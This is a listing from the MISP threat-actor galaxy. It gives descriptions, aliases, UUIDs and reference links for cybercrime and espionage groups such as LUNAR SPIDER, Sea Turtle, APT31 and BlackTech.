UUID 80f07c15-cad3-44a2-a8a4-dd14490b5117
which can be used as unique global reference for PINCHY SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GURU SPIDER
Early in 2018, CrowdStrike Intelligence observed GURU SPIDER supporting the distribution of multiple crimeware families through its flagship malware loader, Quant Loader.
Internal MISP references
UUID 0a667713-bc31-4a72-9ea3-34fc094a9dde
which can be used as unique global reference for GURU SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SALTY SPIDER
Beginning in January 2018 and persisting through the first half of the year, CrowdStrike Intelligence observed SALTY SPIDER, developer and operator of the long-running Sality botnet, distribute malware designed to target cryptocurrency users.
Internal MISP references
UUID 7e37be6b-5a94-45f3-bdeb-f494c520eee3
which can be used as unique global reference for SALTY SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
NOMAD PANDA
In the first quarter of 2018, CrowdStrike Intelligence identified NOMAD PANDA activity targeting Central Asian nations with exploit documents built with the 8.t tool.
Internal MISP references
UUID 4b7df353-fbcc-4f00-a54f-5121c5edb9be
which can be used as unique global reference for NOMAD PANDA
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Flash Kitten
This suspected Iran-based adversary conducted long-running SWC campaigns from December 2016 until public disclosure in July 2018. Like other Iran-based actors, the target scope for FLASH KITTEN appears to be focused on the MENA region.
Internal MISP references
UUID 6e899dd4-f95e-42a0-a5a3-e57249f017cf
which can be used as unique global reference for Flash Kitten
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TINY SPIDER
According to CrowdStrike, this actor is using TinyLoader and TinyPOS, potentially buying access through Dridex infections.
Internal MISP references
UUID 89a05f9f-a6dc-4426-8c15-a8d5ef6d8524
which can be used as unique global reference for TINY SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
LUNAR SPIDER
According to CrowdStrike, this actor is using BokBok/IcedID, potentially buying distribution through Emotet infections. On March 17, 2019, CrowdStrike Intelligence observed the use of a new BokBot (developed and operated by LUNAR SPIDER) proxy module in conjunction with TrickBot (developed and operated by WIZARD SPIDER), which may provide WIZARD SPIDER with additional tools to steal sensitive information and conduct fraudulent wire transfers. This activity also provides further evidence to support the existence of a flourishing relationship between these two actors. Lunar Spider is reportedly associated withGrim Spider and Wizard Spider.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LUNAR SPIDER.
Known Synonyms |
---|
GOLD SWATHMORE |
Internal MISP references
UUID 0db4c708-f33d-4d46-906d-12fdf7415f62
which can be used as unique global reference for LUNAR SPIDER
in MISP communities and other software using the MISP galaxy
External references
- https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/ - webarchive
- https://www.crowdstrike.com/blog/wizard-spider-lunar-spider-shared-proxy-module/ - webarchive
- https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-swathmore - webarchive
Associated metadata
Metadata key | Value |
---|---|
RATPAK SPIDER
In July 2018, the source code of Pegasus, RATPAK SPIDER’s malware framework, was anonymously leaked. This malware has been linked to the targeting of Russia’s financial sector. Associated malware, Buhtrap, which has been leaked previously, was observed this year in connection with SWC campaigns that also targeted Russian users.
Internal MISP references
UUID ec3fda76-8c1c-4019-8109-3f92e6b15633
which can be used as unique global reference for RATPAK SPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Operation Kabar Cobra
Internal MISP references
UUID 9ba291f2-b107-402d-9083-3128395ff26e
which can be used as unique global reference for Operation Kabar Cobra
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
APT-C-36
Since April 2018, an APT group (Blind Eagle, APT-C-36) suspected coming from South America carried out continuous targeted attacks against Colombian government institutions as well as important corporations in financial sector, petroleum industry, professional manufacturing, etc.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT-C-36.
Known Synonyms |
---|
Blind Eagle |
Internal MISP references
UUID ae1c64ff-5a37-4291-97f8-ea402c63efd0
which can be used as unique global reference for APT-C-36
in MISP communities and other software using the MISP galaxy
External references
- https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/ - webarchive
- https://www.ecucert.gob.ec/wp-content/uploads/2022/03/alerta-APTs-2022-03-23.pdf - webarchive
- https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia - webarchive
- https://lab52.io/blog/apt-c-36-recent-activity-analysis/ - webarchive
- https://www.trendmicro.com/en_ph/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html - webarchive
- https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/ - webarchive
- https://attack.mitre.org/groups/G0099/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Ecuador', 'Colombia', 'Spain', 'Panama', 'Chile'] |
cfr-target-category | ['Petroleum', 'Manufacturing', 'Financial', 'Private sector', 'Government'] |
cfr-type-of-incident | Espionage |
IRIDIUM
Resecurity’s research indicates that the attack on Parliament is a part of a multi-year cyberespionage campaign orchestrated by a nation-state actor whom we are calling IRIDIUM. This actor targets sensitive government, diplomatic, and military resources in the countries comprising the Five Eyes intelligence alliance (which includes Australia, Canada, New Zealand, the United Kingdom and the United States)
Internal MISP references
UUID 29cfe970-5446-4cfc-a2da-00e9f49e02ba
which can be used as unique global reference for IRIDIUM
in MISP communities and other software using the MISP galaxy
External references
- https://www.nbcnews.com/politics/national-security/iranian-backed-hackers-stole-data-major-u-s-government-contractor-n980986 - webarchive
- https://threatpost.com/ranian-apt-6tb-data-citrix/142688/ - webarchive
- https://hub.packtpub.com/resecurity-reports-iriduim-behind-citrix-data-breach-200-government-agencies-oil-and-gas-companies-and-technology-companies-also-targeted/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 10 |
country | IR |
Related clusters
To see the related clusters, click here.
SandCat
SandCat, on the other hand, is a group that was discovered more recently by Kaspersky. One of the Windows vulnerabilities patched by Microsoft in December had been exploited by both FruityArmor and SandCat in attacks targeting the Middle East and Africa. SandCat has been using FinFisher/FinSpy spyware and CHAINSHOT, a piece of malware analyzed earlier this year by Palo Alto Networks. The group has also used the CVE-2018-8589 and CVE-2018-8611 Windows vulnerabilities in its attacks, both of which had a zero-day status when Microsoft released fixes.
Internal MISP references
UUID dc15f388-a353-4185-b28e-015745f708ba
which can be used as unique global reference for SandCat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Operation Comando
Operation Comando is a pure cybercrime campaign, possibly with Brazilian origin, with a concrete and persistent focus on the hospitality sector, which proves how a threat actor can be successful in pursuing its objectives while maintaining a cheap budget. The use of DDNS services, publicly available remote access tools, and having a minimum knowledge on software development (in this case VB.NET) has been enough for running a campaign lasting month, and potentially gathering credit card information and other possible data.
Internal MISP references
UUID 35c40ce2-57c0-479e-8a56-efbb8695e395
which can be used as unique global reference for Operation Comando
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
APT-C-27
A threat actor which is ac tive since at least November 2014. This group launched long-term at tacks against organizations in the Syrian region using Android and Windows malwares. Its objective is the theft of sensitive information.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT-C-27.
Known Synonyms |
---|
ATK80 |
GoldMouse |
Golden RAT |
Internal MISP references
UUID ee7f535d-cc3e-40f3-99f3-c97963cfa250
which can be used as unique global reference for APT-C-27
in MISP communities and other software using the MISP galaxy
External references
- https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/ - webarchive
- https://ti.360.net/blog/articles/analysis-of-apt-c-27/ - webarchive
- https://web.archive.org/web/20180827024318/http://csecybsec.com/download/zlab/20180723_CSE_APT27_Syria_v1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | SY |
since | 2014 |
suspected-victims | ['Middle East', 'Syria'] |
Operation ShadowHammer
Newly discovered supply chain attack that leveraged ASUS Live Update software. The goal of the attack was to surgically target an unknown pool of users, which were identified by their network adapters’ MAC addresses. To achieve this, the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation. We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack. Of course, there might be other samples out there with different MAC addresses in their list.
Internal MISP references
UUID 401c30c7-4317-458a-9b0a-379a44d63457
which can be used as unique global reference for Operation ShadowHammer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Whitefly
In July 2018, an attack on Singapore’s largest public health organization, SingHealth, resulted in a reported 1.5 million patient records being stolen. Until now, nothing was known about who was responsible for this attack. Symantec researchers have discovered that this attack group, which we call Whitefly, has been operating since at least 2017, has targeted organizations based mostly in Singapore across a wide variety of sectors, and is primarily interested in stealing large amounts of sensitive information.
Internal MISP references
UUID 943f490e-ac7f-40fe-b6f3-33e2623649d2
which can be used as unique global reference for Whitefly
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Sea Turtle
This blog post discusses the technical details of a state-sponsored attack manipulating DNS systems. While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system. DNS is a foundational technology supporting the Internet. Manipulating that system has the potential to undermine the trust users have on the internet. That trust and the stability of the DNS system as a whole drives the global economy. Responsible nations should avoid targeting this system, work together to establish an accepted global norm that this system and the organizations that control it are off-limits, and cooperate in pursuing those actors who act irresponsibly by targeting this system.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Sea Turtle.
Known Synonyms |
---|
COSMIC WOLF |
Marbled Dust |
SILICON |
Teal Kurma |
UNC1326 |
Internal MISP references
UUID ce7bba52-5ae8-44ea-9979-68502d832ab7
which can be used as unique global reference for Sea Turtle
in MISP communities and other software using the MISP galaxy
External references
- https://blog.talosintelligence.com/2019/04/seaturtle.html - webarchive
- https://blog.talosintelligence.com/sea-turtle-keeps-on-swimming - webarchive
- https://www.reuters.com/article/us-cyber-attack-hijack-exclusive/exclusive-hackers-acting-in-turkeys-interests-believed-to-be-behind-recent-cyberattacks-sources-idUSKBN1ZQ10X - webarchive
- https://icann.zoom.us/recording/play/AhQB4AQyjCuEJGz2wQQans0Xqkz3su8swGLQoORJhdECw9ttz0TbuyzBlue85gIY - webarchive
- https://community.icann.org/download/attachments/109483867/Cybersecurity%20and%20the%20ICANN%20Ecosystem.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.domaintools.com/resources/blog/finding-additional-indicators-with-passive-dns-within-domaintools-iris - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2022GTR.pdf - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi?id=101738 - webarchive
- https://threatintel.eu/2020/02/25/on-sea-turtle-campaign-targeting-greek-governmental-organisations-timeline - webarchive
- https://www.mandiant.com/resources/blog/global-dns-hijacking-campaign-dns-record-manipulation-at-scale - webarchive
- https://www.virusbulletin.com/uploads/pdf/magazine/2019/VB2019-Mercer-Rascagneres.pdf - webarchive
- https://www.youtube.com/watch?v=ws1k44ZhJ3g - webarchive
- https://www.bsi.bund.de/DE/Themen/Unternehmen-und-Organisationen/Cyber-Sicherheitslage/Analysen-und-Prognosen/Threat-Intelligence/Aktive_APT-Gruppen/aktive-apt-gruppen_node.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-victims | ['Germany'] |
country | TR |
Related clusters
To see the related clusters, click here.
Silent Librarian
Last Friday, Deputy Attorney General Rod Rosenstein announced the indictment of nine Iranians who worked for an organization named the Mabna Institute. According to prosecutors, the defendants stole more than 31 terabytes of data from universities, companies, and government agencies around the world. The cost to the universities alone reportedly amounted to approximately $3.4 billion. The information stolen from these universities was used by the Islamic Revolutionary Guard Corps (IRGC) or sold for profit inside Iran. PhishLabs has been tracking this same threat group since late-2017, designating them Silent Librarian. Since discovery, we have been working with the FBI, ISAC partners, and other international law enforcement agencies to help understand and mitigate these attacks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Silent Librarian.
Known Synonyms |
---|
COBALT DICKENS |
Mabna Institute |
TA407 |
TA4900 |
Yellow Nabu |
Internal MISP references
UUID 5059b44d-2753-4977-b987-4922f09afe6b
which can be used as unique global reference for Silent Librarian
in MISP communities and other software using the MISP galaxy
External references
- https://info.phishlabs.com/blog/silent-librarian-more-to-the-story-of-the-iranian-mabna-institute-indictment - webarchive
- https://info.phishlabs.com/blog/silent-librarian-university-attacks-continue-unabated-in-days-following-indictment - webarchive
- https://www.justice.gov/usao-sdny/pr/nine-iranians-charged-conducting-massive-cyber-theft-campaign-behalf-islamic - webarchive
- https://www.justice.gov/opa/pr/nine-iranians-charged-conducting-massive-cyber-theft-campaign-behalf-islamic-revolutionary - webarchive
- https://www.secureworks.com/blog/cobalt-dickens-goes-back-to-school-again - webarchive
- https://www.secureworks.com/blog/back-to-school-cobalt-dickens-targets-universities - webarchive
- https://www.proofpoint.com/us/threat-insight/post/seems-phishy-back-school-lures-target-university-students-and-staff - webarchive
- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-dickens - webarchive
- https://community.riskiq.com/article/44eb0802 - webarchive
- https://www.proofpoint.com/us/corporate-blog/post/iranian-state-sponsored-and-aligned-attacks-what-you-need-know-and-steps-protect - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | IR |
APT31
FireEye characterizes APT31 as an actor specialized on intellectual property theft, focusing on data and projects that make a particular organization competetive in its field. Based on available data (April 2016), FireEye assesses that APT31 conducts network operations at the behest of the Chinese Government. Also according to Crowdstrike, this adversary is suspected of continuing to target upstream providers (e.g., law firms and managed service providers) to support additional intrusions against high-profile assets. In 2018, CrowdStrike observed this adversary using spear-phishing, URL “web bugs” and scheduled tasks to automate credential harvesting.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT31.
Known Synonyms |
---|
BRONZE VINEWOOD |
JUDGMENT PANDA |
Red keres |
TA412 |
Violet Typhoon |
ZIRCONIUM |
Zirconium |
Internal MISP references
UUID 6bf7e6b6-5917-45a6-9567-f0baba79768c
which can be used as unique global reference for APT31
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/security/blog/2017/03/27/detecting-and-mitigating-elevation-of-privilege-exploit-for-cve-2017-0005/ - webarchive
- https://duo.com/decipher/apt-groups-moving-down-the-supply-chain - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf - webarchive
- https://redalert.nshc.net/2019/12/03/threat-actor-targeting-hong-kong-activists - webarchive
- https://twitter.com/bkMSFT/status/1201876664667582466 - webarchive
- https://www.secureworks.com/research/bronz-vinewood-uses-hanaloader-to-target-government-supply-chain - webarchive
- https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-vinewood - webarchive
- https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://research.checkpoint.com/2021/the-story-of-jian - webarchive
- https://supo.fi/-/suojelupoliisi-tunnisti-eduskuntaan-kohdistuneen-kybervakoiluoperaation-apt31-ksi - webarchive
- https://poliisi.fi/-/eduskunnan-tietojarjestelmiin-kohdistuneen-tietomurron-tutkinnassa-selvitetaan-yhteytta-apt31-toimijaan - webarchive
- https://pst.no/alle-artikler/pressemeldinger/etterforskningen-av-datanettverksoperasjonen-mot-fylkesmannsembetene-er-avsluttet - webarchive
- https://www.nrk.no/norge/pst_-har-etterretning-om-at-kinesisk-gruppe-stod-bak-dataangrep-mot-statsforvaltere-1.15540601 - webarchive
- https://www.ncsc.gov.uk/news/uk-allies-hold-chinese-state-responsible-for-pervasive-pattern-of-hacking - webarchive
- https://www.gov.uk/government/news/uk-and-allies-hold-chinese-state-responsible-for-a-pervasive-pattern-of-hacking - webarchive
- https://www.foreignminister.gov.au/minister/marise-payne/media-release/australia-joins-international-partners-attribution-malicious-cyber-activity-china - webarchive
- https://www.consilium.europa.eu/en/press/press-releases/2021/07/19/declaration-by-the-high-representative-on-behalf-of-the-eu-urging-china-to-take-action-against-malicious-cyber-activities-undertaken-from-its-territory/ - webarchive
- https://www.cert.ssi.gouv.fr/ioc/CERTFR-2021-IOC-003 - webarchive
- https://twitter.com/bkMSFT/status/1417823714922610689 - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists - webarchive
- https://www.fortinet.com/blog/psirt-blogs/importance-of-patching-an-analysis-of-the-exploitation-of-n-day-vulnerabilities - webarchive
- https://intrusiontruth.wordpress.com/2023/05/11/article-1-whats-cracking-at-the-kerui-cracking-academy - webarchive
- https://intrusiontruth.wordpress.com/2023/05/12/the-illustrious-graduates-of-wuhan-kerui - webarchive
- https://intrusiontruth.wordpress.com/2023/05/13/all-roads-lead-back-to-wuhan-xiaoruizhi-science-and-technology-company - webarchive
- https://intrusiontruth.wordpress.com/2023/05/15/trouble-in-paradise - webarchive
- https://intrusiontruth.wordpress.com/2023/05/16/introducing-cheng-feng - webarchive
- https://intrusiontruth.wordpress.com/2023/05/17/missing-links - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-Common-TTPs-of-attacks-against-industrial-organizations-implants-for-remote-access-En.pdf - webarchive
- https://asec.ahnlab.com/ko/55070 - webarchive
- https://intrusiontruth.wordpress.com/2023/07/04/wuhan-xiaoruizhi-class-of-19 - webarchive
- https://intrusiontruth.wordpress.com/2023/07/07/one-man-and-his-lasers - webarchive
- https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2023-02-bfv-cyber-brief.pdf?__blob=publicationFile&v=6 - webarchive
- https://www.justice.gov/opa/pr/seven-hackers-associated-chinese-government-charged-computer-intrusions-targeting-perceived - webarchive
- https://www.justice.gov/opa/media/1345141/dl?inline - webarchive
- https://www.gov.uk/government/news/uk-holds-china-state-affiliated-organisations-and-individuals-responsible-for-malicious-cyber-activity - webarchive
- https://harfanglab.io/en/insidethelab/apt31-indictment-analysis/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Related clusters
To see the related clusters, click here.
Blackgear
BLACKGEAR is an espionage campaign which has targeted users in Taiwan for many years. Multiple papers and talks have been released covering this campaign, which used the ELIRKS backdoor when it was first discovered in 2012. It is known for using blogs and microblogging services to hide the location of its actual command-and-control (C&C) servers. This allows an attacker to change the C&C server used quickly by changing the information in these posts. Like most campaigns, BLACKGEAR has evolved over time. Our research indicates that it has started targeting Japanese users. Two things led us to this conclusion: first, the fake documents that are used as part of its infection routines are now in Japanese. Secondly, it is now using blogging sites and microblogging services based in Japan for its C&C activity.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Blackgear.
Known Synonyms |
---|
BLACKGEAR |
Comnie |
Topgear |
Internal MISP references
UUID 8b62b20a-5b1c-48af-8424-e8220cd2fbd7
which can be used as unique global reference for Blackgear
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
BlackOasis
BlackOasis is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. A group known by Microsoft as NEODYMIUM is reportedly associated closely with BlackOasis operations, but evidence that the group names are aliases has not been identified.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackOasis.
Known Synonyms |
---|
G0063 |
Internal MISP references
UUID 8fbd195f-5e03-4e85-8ca5-4f1dff300bec
which can be used as unique global reference for BlackOasis
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
BlackTech
BlackTech is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong. Based on the mutexes and domain names of some of their C&C servers, BlackTech’s campaigns are likely designed to steal their target’s technology. Following their activities and evolving tactics and techniques helped us uncover the proverbial red string of fate that connected three seemingly disparate campaigns: PLEAD, Shrouded Crossbow, and of late, Waterbear. PLEAD is an information theft campaign with a penchant for confidential documents. Active since 2012, it has so far targeted Taiwanese government agencies and private organizations. PLEAD’s toolset includes the self-named PLEAD backdoor and the DRIGO exfiltration tool. PLEAD uses spear-phishing emails to deliver and install their backdoor, either as an attachment or through links to cloud storage services. Some of the cloud storage accounts used to deliver PLEAD are also used as drop off points for exfiltrated documents stolen by DRIGO. PLEAD actors use a router scanner tool to scan for vulnerable routers, after which the attackers will enable the router’s VPN feature then register a machine as virtual server. This virtual server will be used either as a C&C server or an HTTP server that delivers PLEAD malware to their targets.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackTech.
Known Synonyms |
---|
CIRCUIT PANDA |
Earth Hundun |
G0098 |
HUAPI |
Manga Taurus |
Palmerworm |
Red Djinn |
T-APT-03 |
Temp.Overboard |
Internal MISP references
UUID 320c42f7-eab7-4ef9-b09a-74396caa6c3e
which can be used as unique global reference for BlackTech
in MISP communities and other software using the MISP galaxy
External references
- https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/ - webarchive
- https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/ - webarchive
- https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt - webarchive
- https://unit42.paloaltonetworks.com/atoms/mangataurus/ - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://www.trendmicro.com/en_us/research/24/d/earth-hundun-waterbear-deuterbear.html - webarchive
- https://blogs.jpcert.or.jp/en/2022/03/jsac2022report1.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
FIN5
FIN5 is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FIN5.
Known Synonyms |
---|
G0053 |
Internal MISP references
UUID 44dc2f9c-8c28-11e9-9b9a-7fdced8cbf70
which can be used as unique global reference for FIN5
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
FIN1
FireEye first identified this activity during a recent investigation at an organization in the financial industry. They identified the presence of a financially motivated threat group that they track as FIN1, whose activity at the organization dated back several years. The threat group deployed numerous malicious files and utilities, all of which were part of a malware ecosystem referred to as ‘Nemesis’ by the malware developer(s), and used this malware to access the victim environment and steal cardholder data. FIN1, which may be located in Russia or a Russian-speaking country based on language settings in many of their custom tools, is known for stealing data that is easily monetized from financial services organizations such as banks, credit unions, ATM operations, and financial transaction processing and financial business services companies.
Internal MISP references
UUID 13289552-596e-4592-9c81-eeb4db6baf3c
which can be used as unique global reference for FIN1
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
FIN10
FireEye has observed multiple targeted intrusions occurring in North America — predominately in Canada — dating back to at least 2013 and continuing through at least 2016, in which the attacker(s) have compromised organizations’ networks and sought to monetize this illicit access by exfiltrating sensitive data and extorting victim organizations. In some cases, when the extortion demand was not met, the attacker(s) destroyed production Windows systems by deleting critical operating system files and then shutting down the impacted systems. Based on near parallel TTPs used by the attacker(s) across these targeted intrusions, we believe these clusters of activity are linked to a single, previously unobserved actor or group that we have dubbed FIN10.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FIN10.
Known Synonyms |
---|
G0051 |
Internal MISP references
UUID f2d02410-8c2c-11e9-8df1-a31c1fb33d79
which can be used as unique global reference for FIN10
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GhostNet
Cyber espionage is an issue whose time has come. In this second report from the Information Warfare Monitor, we lay out the findings of a 10-month investigation of alleged Chinese cyber spying against Tibetan institutions. The investigation, consisting of fieldwork, technical scouting, and laboratory analysis, discovered a lot more. The investigation ultimately uncovered a network of over 1,295 infected hosts in 103 countries. Up to 30% of the infected hosts are considered high-value targets and include computers located at ministries of foreign affairs, embassies, international organizations, news media, and NGOs. The Tibetan computer systems we manually investigated, and from which our investigations began, were conclusively compromised by multiple infections that gave attackers unprecedented access to potentially sensitive information. Attacks on the Dalai Lama’s Private Office The OHHDL started to suspect it was under surveillance while setting up meetings be-tween His Holiness and foreign dignitaries. They sent an email invitation on behalf of His Holiness to a foreign diplomat, but before they could follow it up with a courtesy telephone call, the diplomat’s office was contacted by the Chinese government and warned not to go ahead with the meeting. The Tibetans wondered whether a computer compromise might be the explanation; they called ONI Asia who called us. (Until May 2008, the first author was employed on a studentship funded by the OpenNet Initiative and the second author was a principal investigator for ONI.)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GhostNet.
Known Synonyms |
---|
Snooping Dragon |
Internal MISP references
UUID cacf2ffc-8c49-11e9-895e-7f5bf9c2ff6d
which can be used as unique global reference for GhostNet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
GozNym
IBM X-Force Research uncovered a Trojan hybrid spawned from the Nymaim and Gozi ISFB malware. It appears that the operators of Nymaim have recompiled its source code with part of the Gozi ISFB source code, creating a combination that is being actively used in attacks against more than 24 U.S. and Canadian banks, stealing millions of dollars so far. X-Force named this new hybrid GozNym. The new GozNym hybrid takes the best of both the Nymaim and Gozi ISFB malware to create a powerful Trojan. From the Nymaim malware, it leverages the dropper’s stealth and persistence; the Gozi ISFB parts add the banking Trojan’s capabilities to facilitate fraud via infected Internet browsers. The end result is a new banking Trojan in the wild.
Internal MISP references
UUID 7803b380-8c4c-11e9-90a1-f3880ab3aaa0
which can be used as unique global reference for GozNym
in MISP communities and other software using the MISP galaxy
External references
- https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/ - webarchive
- https://threatpost.com/attackers-behind-goznym-trojan-set-sights-on-europe/117647/ - webarchive
- https://threatpost.com/goznym-banking-trojan-targeting-german-banks/120075/ - webarchive
- https://www.europol.europa.eu/newsroom/news/goznym-malware-cybercriminal-network-dismantled-in-international-operation - webarchive
Associated metadata
Metadata key | Value |
---|---|
Group5
A threat actor using Iranian-language tools, Iranian hosting companies, operating from the Iranian IP space at times was observed targeting the Syrian opposition in an elaborately staged malware operation, Citizen Lab researchers reveal. The operation was first noticed in late 2015, when a member of the Syrian opposition flagged a suspicious email containing a PowerPoint slideshow, which led researchers to a watering hole website with malicious programs, malicious PowerPoint files, and Android malware. The threat actor was targeting Windows and Android devices of well-connected individuals in the Syrian opposition, researchers discovered. They called the actor Group5, because it targets Syrian opposition after regime-linked malware groups, the Syrian Electronic Army, ISIS (also known as the Islamic State or ISIL), and a group linked to Lebanon did the same in the past
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Group5.
Known Synonyms |
---|
G0043 |
Internal MISP references
UUID bc8390aa-8c4e-11e9-a9cb-e37c361210af
which can be used as unique global reference for Group5
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Honeybee
McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our analysts have named this Operation Honeybee, based on the names of the malicious documents used in the attacks. Advanced Threat Research analysts have also discovered malicious documents authored by the same actor that indicate a tactical shift. These documents do not contain the typical lures by this actor, instead using Word compatibility messages to entice victims into opening them. The Advanced Threat Research team also observed a heavy concentration of the implant in Vietnam from January 15–17.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Honeybee.
Known Synonyms |
---|
G0072 |
Internal MISP references
UUID 2d82a18e-8c53-11e9-b0ec-536b62fa3d86
which can be used as unique global reference for Honeybee
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Lucky Cat
